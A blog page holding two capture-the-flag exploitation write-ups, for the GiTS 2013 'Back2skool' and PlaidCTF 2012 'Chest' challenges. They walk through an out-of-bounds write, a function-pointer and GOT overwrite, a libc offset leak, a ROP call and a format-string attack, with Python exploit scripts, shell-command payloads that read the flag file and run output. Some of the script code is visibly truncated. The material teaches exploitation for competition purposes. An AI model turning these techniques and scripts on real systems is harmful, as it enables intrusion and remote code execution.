# codezen.frcode hacking, zen coding

19Feb/13Off

## GiTS 2013 CTF – Pwnables 250 Question 10 – Back2skool Write-up

#### Posted by aXs

back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, stripped

This is the binary for MathServ, "The one-stop shop for all your arithmetic needs".

\$ nc localhost 31337
__  ___      __  __   _____
/  |/  /___ _/ /_/ /_ / ___/___  ______   __ v0.01
/ /|_/ / __ `/ __/ __ \\__ \/ _ \/ ___/ | / /
/ /  / / /_/ / /_/ / / /__/ /  __/ /   | |/ /
/_/  /_/\__,_/\__/_/ /_/____/\___/_/    |___/
===============================================
Welcome to MathServ! The one-stop shop for all your arithmetic needs.
This program was written by a team of fresh CS graduates using only the most
agile of spiraling waterfall development methods, so rest assured there are
no bugs here!

Your current workspace is comprised of a 10-element table initialized as:
{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 }

Commands:
write Write value to given index in table
func2 Change operation to multiplication
math  Perform math operation on table
exit  Quit and disconnect
1
Value at position 1: 1
write
Input position to write to:
1
Input numeric value to write:
10
Value at position 1: 10
func1
math
Result of math: 54
exit
Exiting program!

You can read and write numbers to an array and perform addition or multiplication of all the entries of the array.

Lets check how the "read" function works:

sendString(sockfd, (int)"Input position to read from:\n");
position = atoi(&nptr);
value =  *(_DWORD *)&values[4 * position];
sock_printf(sockfd, "Value at position %d: %d\n", value);

There is 2 vulnerabilities here:
- There is no bound checking on the position value
- position can be signed, allowing to use a negative offset

Basically, you can read and write any memory, this will prove useful for information leak purpose.

Lets move to the "write" function:

position = atoi(&nptr);
if ( position <= 9 )
{
sendString(sockfd, (int)"Input numeric value to write:\n");
*(_DWORD *)&values[4 * position] = atoi(&nptr);
sock_printf(sockfd, "Value at position %d: %d\n", position);
}
else
{
sendString(sockfd, (int)"Table index too large!\n");
}

Almost the same story here except we have an inefficient bound checking:
- You can still enter negative number and the if() check will pass
- As position is signed and later multiplied by 4 (left shifted by 2 positions), we can get the sign bit to disappear

10000000000000000000000000000011 = -2147483645 = 0x80000003
<< 2 00000000000000000000000000001100 = 12 = 0xC Now lets focus on the "math" command:

.text:080493A5                 mov     eax, ds:(math_ptr - 804BF54h)[ebx]
.text:080493AB                 mov     edx, [eax]
.text:080493AD                 mov     dword ptr [esp+4], 0Ah
.text:080493B5                 mov     eax, ds:(values_ptr - 804BF54h)[ebx]
.text:080493BB                 mov     [esp], eax
.text:080493BE                 call    edx

The function pointer stored in math_ptr is called directly. If we can overwrite the content of this math_ptr and replace it with an EIP we control, we will get remote code execution.

Some complications:
- The stack is NX
- The binary has been compiled with RELRO: read-only sections: .got, .dtors, etc...
- There is no interesting functions loaded in the GOT table for exploitation: no system, mmap, mprotected or execve

So our exploit workflow will be:
- Do information leak: get the address of libc's __libc_start_main in the GOT table
- Overwrite the math_ptr with a stack pivot
- Fill the values array with a shell command line : cat key>&4
- Fill a user controled buffer with a small ROP chain to call system() with the values array as parameter

Our stack pivot:

.text:08049550                 pop     ebx
.text:08049551                 pop     esi
.text:08049552                 pop     edi
.text:08049553                 pop     ebp
.text:08049554                 retn

A last importance piece of the puzzle is the exact offset of the system() function in memory. Using a previous challenge shell, we found out that the challenge box is running Ubuntu Precise i386 with libc 2.15. We need this to get the offset of system() inside libc6.so. You can download this specific version from here for example: http://109.203.104.18/automate/instances/linuxmint/pbuilder/precise-i386/base.cow/lib/i386-linux-gnu/libc-2.15.so

Using the information leak, we got the address of __libc_start_main() in memory. If we have the distance (offset) between __libc_start_main() and system(), we can calculate the system() function's address in memory.

\$ gdb libc.so.6
Reading symbols from libc.so.6...(no debugging symbols found)...done.
gdb\$ p system
\$1 = {<text variable, no debug info>} 0x3d170 <system>
gdb\$ p __libc_start_main
\$2 = {<text variable, no debug info>} 0x193e0 <__libc_start_main>

The offset between __libc_start_main() and system() is 0x3d170 - 0x193e0 = 0x23D90

So in memory, the address of system() will be the address of __libc_start_main() + 0x23D90

And we know the __libc_start_main() address from the GOT table.

We got everything, so here is the exploit:

import ctypes
import telnetlib
from struct import pack, unpack

math_ptr = 0x0804BFEC
user_ptr = 0x080499B8
got_table_start = 0x0804BF54
got_table_end = 0x0804BFFC

position = offset_to_position(offset)
tn.write(str(position) + "\n")
return ctypes.c_ulong(value).value

def write_memory(offset, value):
position = offset_to_position(offset)
tn.write("write\n")
tn.write(str(position) + "\n")
tn.write(str(ctypes.c_long(value).value) + "\n")
return ctypes.c_ulong(value).value

def overwrite_got_pointer(got, offset, value):
return write_memory(got[int(offset, 16)], value)

position = -((addr_values - offset) >> 2)
else:
position = 0x80000000 + ((offset - addr_values) >> 2)
return ctypes.c_long(position).value

HOST = 'back2skool.2013.ghostintheshellcode.com'
PORT = 31337

tn = telnetlib.Telnet(HOST, PORT)

print "Dumping GOT..."

got = {}
ptr = {}

for offset in range(got_table_start, got_table_end+4, 4):
hex_value = hex(value)
#print hex(offset),":", hex_value
got[offset] = value

print "Getting fd and __libc_start_main offset from GOT"

ptr['__libc_start_main'] = got[0x0804BF9C]

for value in ptr:
print value, '=', hex(ptr[value])

# Challenge box was Ubuntu Precise i386 with libc 2.15
system_ptr = ptr['__libc_start_main'] + (0x3d170 - 0x193e0) # __libc_start_main - system

print "system() is at", hex(system_ptr)

print "Math vfptr at " + hex(math)
print "Current math vfptr is", hex(read_memory(math))

print "Overwriting math vfptr with stack pivot"
write_memory(math, 0x08049550)

print "Current math vfptr is", hex(read_memory(math))

print "Filling values array with shell command"
# cat key>&4\n

print "Putting ROP chain on the stack"
tn.write('ABCD' + pack('<I', system_ptr) + 'ABCD' + pack('<I', addr_values)  + "\n")

print "Pwning!"
tn.write("math\n")

tn.write("exit\n")

Results:

\$ python pwn250.py
Dumping GOT...
Getting fd and __libc_start_main offset from GOT
sockfd = 0x4L
__libc_start_main = 0xf76133e0L
system() is at 0xf7637170L
Math vfptr at 0x804c078L
Current math vfptr is 0x0L
Overwriting math vfptr with stack pivot
Current math vfptr is 0x8049550L
Filling values array with shell command
Putting ROP chain on the stack
Pwning!
You couldn't own a box if you purchased it

Key is "You couldn't own a box if you purchased it"

2May/12Off

## PlaidCTF 2012 – Pwnables 300 – Chest Writeup

#### Posted by aXs

Robots are running secret service that aims to mill down diamonds into fairy dust, and use it to take over our world! Help us please!
23.22.1.14:1282

In this challenge we have a telnet interface to a nice chest that can store an item, remove an item or view the list of stored items.

Welcome to the Adventurers' storage room!
If you don't yet have a personal chest, you can use this one: XXXXFJ4bO1
Which chest to you wish to access? [XXXXFJ4bO1]:
Using chest XXXXFJ4bO1

What do you want to do?

[1] View items
[2] Store an item
[3] Take an item
[4] Leave
[5] Destroy the chest
> Choose an option:

After disassembling the binary, we see that there is a format string vulnerability in the "View items" function.

do
{
v0 = sub_8048C7B(dword_804AC90, &v2, 499, 0);
dprintf(fd, (const char *)&v2);
}

The name of the item is used as format to dprintf. So easy right ? Not so fast...

There is a function that filter heavily user input based on a whitelist:

n = strspn(src, "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&-+ ");

The percent character is of course not whitelisted so we cannot send a format string.

To exploit this vulnerability, we need to combine it with another design conception error: when you connect to the service, you can input the name of the chest you want to open.

The error is that if you connect simultaneously 2 clients, ask both clients to open the same chest and use the destroy chest function in one client, the other client will malfunction in a very interesting way.

Rember this read loop for viewing the items ?

do
{
v0 = sub_8048C7B(dword_804AC90, &v2, 499, 0);
dprintf(fd, (const char *)&v2);
}
...
int __cdecl sub_8048C7B(int fd, void *a2, int a3, char a4)
{
char v4; // al@3
char v5; // al@7
void *buf; // [sp+28h] [bp-10h]@1
ssize_t v8; // [sp+2Ch] [bp-Ch]@2

buf = a2;
do
{
v5 = a3-- != 0;
if ( !v5 )
break;
v8 = read(fd, buf, 1u); // will return 0
if ( v8 != 1 ) // will pass
{
if ( v8 ) // will not pass
exit(1320024593);
return buf - a2; // will return buf left untouched!
}
v4 = *(_BYTE *)buf == a4;
buf = (char *)buf + 1;
}
while ( !v4 );
return buf - a2;
}

As you can see, as the chest has been destroyed, read() will fail to read anything and the function will return leaving the buffer untouched... untouched means with its previous content... and this function is also used to read the name of the item:

dprintf(fd, "> Store what item? ");
src[sub_8048C7B(fd, (void *)src, 499, 10)] = 0;

So to exploit this we need:
- Connect 2 clients
- Choose the same chest in both clients
- Destroy the chest using one client
- With the client left, store an item with our format string vulnerability
- List the chest content, this will trigger the format string
- An additional action to get the flag (see below)

After reviewing my options, I noticed system() is already part of the GOT table so I will try to overwrite strspn's GOT entry so that an unfiltered string can be used as the system() parameter.

For this, I used hellman's highly recommended libformatstr library which makes format string building very easy.

#!/usr/bin/env python
# -*- coding: latin-1 -*-

import socket
import sys
import re
from libformatstr import FormatStr

if len(sys.argv) != 3:
print '\nUsage:\t./chest.py [host] [port]'
sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

fs = s.makefile()

s.send('\n');

regex = re.compile("Using chest (.*)")
r = regex.search(chest)
chest = r.groups()[0]

print 'Chest', chest

s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host, port))

fs2 = s2.makefile()

s2.send('%s\n' %chest);

# destroy chest
for i in range(1,9):
s.send('5\n');
s.close()

for i in range(1,10):
s2.send('2\n')

got = [0x08048796] # system()
p = FormatStr()

# we start the payload with a non-whitelisted char so that the NUL byte
# is put at the beginning of the string

# view chest content
for i in range(1,9):
s2.send('1\n')

# strspn() is now system()
# fd 4 is our socket
s2.send('ls -la>&4 ; cat key>&4\n')

while 1:
line = s2.recv(4096)
if not line:
break

sys.stdout.flush()

s2.close()

Running our exploit we get (some garbage removed from the beginning):

total 28
drwxr-xr-x 2 root root 4096 Apr 28 04:36 .
drwxr-xr-x 3 root root 4096 Apr 27 19:27 ..
-rwxr-xr-x 1 root root 8564 Apr 27 19:27 chest
lrwxrwxrwx 1 root root 3 Apr 28 04:36 flag -> key
-rw-r--r-- 1 root root 24 Apr 27 03:48 key
-rwxr-xr-x 1 root root 41 Apr 27 19:27 start.sh
lemons_are_in_the_chest

The key is: lemons_are_in_the_chest